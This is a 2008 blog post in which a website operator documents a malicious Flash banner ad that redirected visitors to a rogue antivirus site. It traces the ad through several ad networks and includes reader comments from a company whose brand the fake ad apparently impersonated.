Mystery Diary Digest: Dot.Tunes, Orange Flash Ad and Mysterious ID Q76123

Mac MacHouse






Introduction

There is some confusion involving the orange Flash ad. So we’ve decided to spend a lot of time and explain to our visitors how it started and what is going on from the beginning. And they can make their own conclusions.






Beginning

In mid-December 2007, we started seeing something different on our websites. First, we saw white-yellow Flash ads (a young man in it) that are related to MP3 music. We then started seeing an orange horizontal Flash ad (728 x 90 pixels). When this orange Flash ad started appearing, we also started experience something unpleasant on our websites. Involuntary redirection to Malware Alarm‘s website (malware-scan.com)… There was always this orange Flash ad running at our website before and after the involuntary redirection. It’s not like we have something against the individual or company who ran this particular Flash ad. Inevitably, we came to believe that this orange Flash ad was used as a medium to redirect us and our visitors to the malware scan website.

Some of our visitors may not have seen either white-yellow or orange Flash ad. That’s because many ad companies control their ads such that they will appear depending on some factors including geographical locations.






Finding the ad company

At first, we MacHouse had to find out which ad company was responsible for the orange Flash ad. That was not so easy. And let me explain why. Our primary suspect was AdBrite. Allow me to say at first that they aren’t really involved in this mystery. Screenshot 01 shows their ad system. A publisher is allowed to control which ad to approve and which to reject. As AdBrite was our primary suspect, we simply had to find the orange Flash ad under Approved Ads. I personally spent about 40 minutes trying to find it. But it’s not there. So it turned out that AdBrite was a good guy. And we are sorry to bring up AdBrite’s name.

For us, there was no other suspect. It was possible that another ad company Canep Media brought this orange Flash ad to our system. But Canep Media is always good to us. They are polite and respond to our questions promptly. Canep Media is one of the 3 dozen ad companies trading rich media campaigns at AdECN. And AdBrite is also a seat holder at AdECN, I suppose.

Anyway, let me explain why it could be Canep Media. Screenshot 02 shows AdBrite’s system again. Under the Pricing Options tab, we can decide what to display when there is no ad company who is willing to display an ad at our websites. We are allowed to inject an ad code from another advertising system. This ad campaign is configured such that an ad brought by Canep Media will be displayed at our websites when AdBrite has no advertisers for us. By the way, the ad code says adecn.com. Canep Media acts as a broker. So the actual ad will come from AdECN. There is no particular name, so let’s call this ad from AdECN/Canep Media an escape ad. And we can also designate an escape ad when Canep Media cannot find any advertisers for us. That’s why finding the ad company responsible for the orange Flash ad might not so easy.


malware-scan.com dottunes.net malware alarm
Screenshot 01
  malware-scan.com dottunes.net malware alarm
Screenshot 02



Okay. So far, we have assumed that Dot.Tunes’ orange Flash ad is used as a medium for the involuntary redirection to Malware Alarm. The next step that we had to take is to remove all ads and put just one ad with an ad code from AdECN/Canep Media. And we showed a documentation video under the article of January 1.



Click on the button to watch a documentation video. VTC



This video shows that I had no ads (blank files) at first and then that Dot.Tunes’ orange ad appeared and I was redirected to Malware Alarm’s spam website when an ad code from AdECN/Canep Media was injected. No matter how many times we visited our own websites, we only saw this orange ad.






Other possibilities

How sure are we that Dot.Tunes’ orange Flash ad is responsible for the redirection? Well, it’s not exactly their Flash ad that is in question. First, let me mention that there are a couple of possible exploitation types. One is SQL injection and the other type is iframe injection. Our suspicion goes to the latter. The SQL injection is not the case here because the involuntary redirection occurs even at http://www.mhvt.net/index.php where there is no database used. The SQL injection works such that an exploiter injects a malicious code directly in a database. How about the latter? We don’t use iframe. And we checked several web pages where the redirection had occurred and didn’t find an iframe code. I’m not terribly sure, but one can be redirected with a simple code like

http://xxx.xxx.xxx.xxx/iframe/file.php where xxx.xxx.xxx.xxx is just an IP address of the destination.

It’s also possible that the iframe injection is used before the orange Flash ad reaches our system. Or any exploitation type may be used before the ad is actually delivered to our system. Let’s take a look at the diagram below.


malware-scan.com dottunes.net malware alarm



At the end of December, we contacted Canep Media so that they could investigate our claim that the orange Flash ad from DotTunes was responsible for the redirection. We contacted Canep Media because we didn’t and still don’t know how the Flash ad was relayed and finally reached us. We don’t know the first ad company. It’s shown as AD1 in the diagram. We don’t know how many companies are involved in the trade. There could be more than AD1 and AD3. It’s been 10 days since we first contacted Canep Media. But they haven’t told us anything. I don’t even know if they are investigating our claim. So we don’t know where a malicious code is injected as we don’t even know who AD1 is.

However, whether DotTunes is happy or not, our hypothesis that DotTune’s orange Flash ad is used as a medium for the involuntary redirection to Malware Alarm is true. The screenshots presented in the article of January 5 show that I was redirected at a totally different website, and the orange Flash ad was there. (Pay attention to the status bar.) The second documentation video presented in an article of January 6 shows the same. Their orange ad is there.






Click on the button to watch a documentation video. VTC






Whose Flash ad is it?

We honestly believed that the orange Flash ad in question belongs to Dot.Tunes. But we aren’t sure if that’s the case any more. Although we have no direct business with Dot.Tunes, I personally sent an e-mail message to them. It took them several days to get back to me. You can see the screenshots of the exact messages below, but let me summarize our communication.





  • MacHouse – Tom Bluewater: An orange Flash ad is responsible for an involuntary redirection to a malware website, you know that, right?
  • Dot.Tunes – Jeff Ayling: What Flash ad? We aren’t running any.
  • MacHouse – Tom Bluewater: It’s this one. You mean, it’s not yours?
  • Dot.Tunes – Jeff Ayling: No. I have never seen it.




  • malware-scan.com dottunes.net malware alarm
    Screenshot 03
      malware-scan.com dottunes.net malware alarm
    Screenshot 04
      malware-scan.com dottunes.net malware alarm
    Screenshot 05





    So whose is it? Again, we have no idea. It’s just that one gentleman who called himself Phil Graci posted a comment and demanded that we rewrite an article. He also said that he created this Flash ad. (See Screenshot 06.) Jeff Ayling, Stephen Chukumba, Phil Graci… I have no idea which gentleman is telling us the truth.

    In fact, we were forced to go back to youhide.com and make sure where one would be redirected upon clicking on the orange Flash ad in question. And it’s http://www.dottunes.net/. But it’s not their ad?

      malware-scan.com dottunes.net malware alarm
    Screenshot 06






    Click on the button to watch a documentation video. VTC






    Mysterious ID


    As you see the documentation video presented above, one will be redirected to DotTune’s website with some kind of reference number. (See Screenshot 07.) ref… Or does it stand for referral? So I asked Mr. Ayling if they have an affiliate program. (See Screenshot 05.) Unfortunately, I haven’t heard from him. It seems that he has intentionally stopped communicating to me.

    Furthermore, we spent one hour yesterday trying to find out if Dot.Tunes has a referral program of any kind. We asked Google. And we couldn’t find any evidence that they have a referral program.

      malware-scan.com dottunes.net malware alarm
    Screenshot 07



    In fact, it’s not the matter of at which website you click on the orange Flash ad. If you find the same Flash ad somewhere else and click on it, you can be redirected to DotTune’s website with this ID. We know it because we tested on our own website with an ad code from AdECN/Canep Media. We confirmed that the ID is the same. It’s Q76123.






    Conclusions

    As we noted in our January 1 article, our immediate interest is in showing that there is injury. That is, we wanted to show that Dot.Tunes’ Flash ad has been used to redirect visitors arriving at MHVT.NET/MHOUSE-J.COM to Malware Alarm’s malware website. Because our documentation videos consistently support the hypothesis that the redirection mechanism is triggered somehow only in the presence of Dot.Tunes Flash ad, we have concluded that Dot.Tunes Flash ad is used as a medium for the redirection. A temporary remedy to stop this involuntary redirection exists to our knowledge. By removing the ad code from AdECN/Canep Media and eliminating a possibility of displaying Dot.Tunes Flash, no Internet visitor to MacHouse’s websites has been redirected to Malware Alarm’s malware scan website against their will.

    We are not particularly interested in knowing how injury occurs. That is, it was not our immediate concern in finding out how the redirection mechanism works or where a malicious redirection code is injected. MacHouse has never stated that Dot.Tunes or AdECN/Canep Media is responsible for the injection of a malicious redirection code if there exists such a code. MacHouse is not an acting authority of any kind. Therefore, it is not under our responsibility in finding out how the redirection mechanism exactly works and who is ultimately responsible.

    Furthermore, MacHouse has informed all concerned parties including Dot.Tunes, Canep Media and youhide.com or Certified Nerds LLC in a timely manner. Therefore, our responsibility ended at this point.






    End notes


    It is certain that it is partially our fault that some of our visitors may have been redirected to Malware Alarm’s spam website. We owe them a big apology because we could have removed the ill Flash ad sooner. I wish that we had realized the ad code came from AdECN/Canep Media sooner. I’m not implying in any way that AdECN or Canep Media is responsible for iframe injection or whatever. At least, MacHouse has no supporting evidence for such claim even if it were the case. Also, we have never implied that DotTunes or their web developer has injected a malacious code in their Flash ad.   malware-scan.com dottunes.net malware alarm
    Screenshot 08



    In the meantime, I don’t know how they have cooperated so far (See Screenshot 08.), but if they want to cooperate in finding out how this involuntary redirection works, answering the following three questions would help. Of course, they don’t have to.





    1. Who is your ad company (AD1)?
    2. Do you have a referral program?
    3. What does Q76123 stand for?




    Finally, let me stress that there are a lot of innocent people involved. According to quantcast, Malware Alarm (malware-scan.com) gets 2.8 million unique visitors per month! Some of them are buying their malware and then end up buying another malware-removal application to remove Malware Alarm’s scrap program. For us, our journey is over. We have removed the ad code from AdECN/Canep Media. So our visitors won’t be redirected to Malware Alarm’s spam website for the time being. In the meantime, we are looking forward to seeing a big even around January 16. Hopefully, we will see a big change.


    We would like to add one fact to end this diary digest. We confirmed about 38 hours ago that the orange Flash ad from Dot.Tunes was pulled. We noticed the change when we put the ad code from AdECN/Canep Media back on to test a different theory yesterday. The orange ad has been replaced by another. (See Screenshot 09.) We do not know if Dot.Tunes pulled their ad out for themselves, if it’s ad company’s decision to switch or if there is some kind of investigation and then the orange Flash ad has been suspended. We also confirmed the change at youhide.com yesterday.   malware-scan.com dottunes.net malware alarm
    Screenshot 09






    References:

    Malware-Scan.Com, DotTunes.Net’s Flash Ad and Computer Virus
    More Evidence for Dot.Tunes Flash Banner As Source of Ill Redirection to Malware-Scan.Com
    Destroying Malwarealarm.com
    Flash-Based Ad and Involuntary Redirection to Malware-Scan.com

    This entry was posted in Internet security. Bookmark the permalink.

    5 Responses to Mystery Diary Digest: Dot.Tunes, Orange Flash Ad and Mysterious ID Q76123

    1. Phil Graci says:

      To clarify, I am the lead web developer for DOT.TUNES, I run one of the partner companies TriAgency.

      In my initial response I stated that I created this flash ad, which we did. However not the malware one! What we created was the design for this ad, which was run on a few sites back in Oct/Nov when we did some cross promotion. But the file was not run via an ad network, it was just in the page itself we created for the promotion.

      What seems to have happened is someone running this scam, took our SWF, and maybe opened it via some Flash edit program that lets u open SWFs, or just wrapped it inside another SWF. Either way, they stole our identity to run their scam!

      Thanks again for finding the problem, and I do see that you are questioning that we were involved, and I can promise to everyone in the world that we did not take part in this scam. We had no idea about it until you wrote your article.

      I do appreciate the tone of this post in that it does clarify for your readers the bigger problem. Much appreciated on that.

      Please advise if you have any suggestions!

      Phil
      TriAgency / DOT.TUNES

    2. Phil Graci says:

      We also have no affiliate program. The site is all written in HTML, there is no script or backend code running to even capture any affiliate data! See for yourself, all of our files are HTML files and not PHP or anything.

    3. admin says:

      To Mr. Graci,

      By sensing Mr. Chukumba’s tone and yours, we fear that Dot.Tunes will file a lawsuit against us in a near future for the retraction of our articles and restitution to their damaged reputation, we cannot assist you any further in any way. I have stated before that MacHouse is obligated to make any incorrect statements, if there are, with your supporting evidence stating otherwise. Without it, we have no statement to amend.

    4. Phil Graci says:

      Greetings Admin –

      For the record, to Machouse, MVHT.net, and all your readers, we have absolutely no intention of suing anyone from your companies. We are a small group of independant companies, who prefer to make our money from innovation :)

      I also apologize immensely for my and Mr Chukumba’s initial tone. We misunderstood the spirit of your article, and were too quick to respond. We should have checked with Jeff at DOT.TUNES to see that he had been in contact with you. On his behalf, I do not think he realized what was going on exactly. He is also located in Australia, and the time delay would account for his timeliness in responding, and our not connecting on the issue before you blogged about it! We applaud your efforts to document what was going on, and to try to resolve the issue.

      That being said, you can imagine the worry on our part when we read this article (and the other) which seemed to imply that DOT.TUNES was behind the scam or taking part in it. As I have stated many times before, we were in no way involved! Our initial reaction for you to revise your statement, is unnecessary, because I believe that the record will be straight when people read these blog comments. One request we do have, if ANYTHING could be ammended, it would be that the title of the articles in question (as well as your YouTube video), with the phrase “Dottunes.net’s Flash ad” does seem to imply that it is OUR ad, when in fact it IS NOT!!

      I stated earlier that we (TriAgency) created that ad for a DOT.TUNES promotional campaign. After investigating, I retract that statement – IN FACT WE DID NOT CREATE THAT AD, AND I HAVE PROOF!

      Initially I watched the video documentation and thought the ad looked familiar, and claimed it WAS one of ours. I have to find the ad that I was thinking of, but we did a huge round of ads for various Music, iPhone and iPod Touch blog/websites in the fall of 07. Actually now that I have looked, the ads we made look NOTHING like the one in question. For your perusal, here are all of our banner ads for 2007:

      http://blog.dottunes.net/dt_ad_banners/420_240_ad_c.jpg
      http://blog.dottunes.net/dt_ad_banners/bannerAd2.jpg
      http://blog.dottunes.net/dt_ad_banners/bannerAdd.jpg
      http://blog.dottunes.net/dt_ad_banners/dt_iphone_ad.jpg
      http://blog.dottunes.net/dt_ad_banners/dt_itunes01_ad.jpg
      http://blog.dottunes.net/dt_ad_banners/dt_palm_ad.jpg
      http://blog.dottunes.net/dt_ad_banners/dt_share_ad.jpg
      http://blog.dottunes.net/dt_ad_banners/dt_psp_ad.jpg
      http://blog.dottunes.net/dt_ad_banners/iLounge_bannerAd3.jpg
      http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_iphone.jpg
      http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_palm.jpg
      http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_psp.jpg
      http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_touch.jpg
      http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_wii.jpg

      Something else seem odd once I re-watched your video again this morning.

      DOT.TUNES has ****NEVER***** used the taglines

      “MUSIC SHALL SET YOUR FREE” or “Set your tunes free, and the rest will follow”

      Our word marks are

      “FREE YOUR TUNES” and “Free your tunes, and the rest will follow”

      Other variations always play on “FREE YOUR **device**”, or “FREE THE **musician/dj**”, but we have never ever ever used “Music shall set you free”..

      The font that is used for the word DOT.TUNES is also too wide, which is another clue it is not us.

      SO THIS AD IS A TOTAL FAKE. I fully retract my previous statement that we had created the SWF that is running on ADEcn at all! Initially I thought that one of our ads had been stolen, but in fact, a totally fake ad was made and has malware in it.

      Either someone is trying to make us look bad, or the malware scammer is faking people’s identities to run their game.

      Here are a few of our real ads/promos that were run, and you can see that the ad in question is not even up to par graphically with our real ads.

      We are contacting adECN to try to get to the bottom of who ran this ad. We will stay in touch with you and let you know the outcome. Once again thank you for bringing this to our attention.

      Philip Graci
      TriAgency – http://www.triagency.com
      DOT.TUNES – http://www.dottunes.net

    5. del_lover says:

      I see people getting richer and richer with more advanced bad electronic tools these days. Looks like the attacker decided to mislead everybody and set an alert (which was triggered by this article) for a withdraw in case of risks for him.
      I am thinking of possible law restrictions, digital signatures, isolated Internet spaces, but all these will not combat the hackers. Hackers can always find something new. For example I bet that soon web sites will exploit CPU/memory resources for its own benefit without user’s permission. Imagine a digital signature cracker system, that uses Flash animations running on 1 000 000 computers. Electronic voting systems, be aware!
      For me the best way to avoid crimes, is a good education for all the people in the World. Second, all people need to live well.

      Here is an interesting story for you:
      To avoid bomb detonation via mobile phone, operators request your personal identity for a SIM card purchase. I remember that bombers payed poor old-aged people to buy mobile phone (SIM). Bombs exploded soon. The police found who bought the SIM cards. The police found the old-aged people, which were not criminals at all. Unfortunately the bombers knew that they will get away if they use the old-aged people.

      The human – not an instrument, but an aim – that is my motto.

    Leave a Reply

    Your email address will not be published.

    You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

    Comment spam protected by SpamBam

    Notify me of followup comments via e-mail. You can also subscribe without commenting.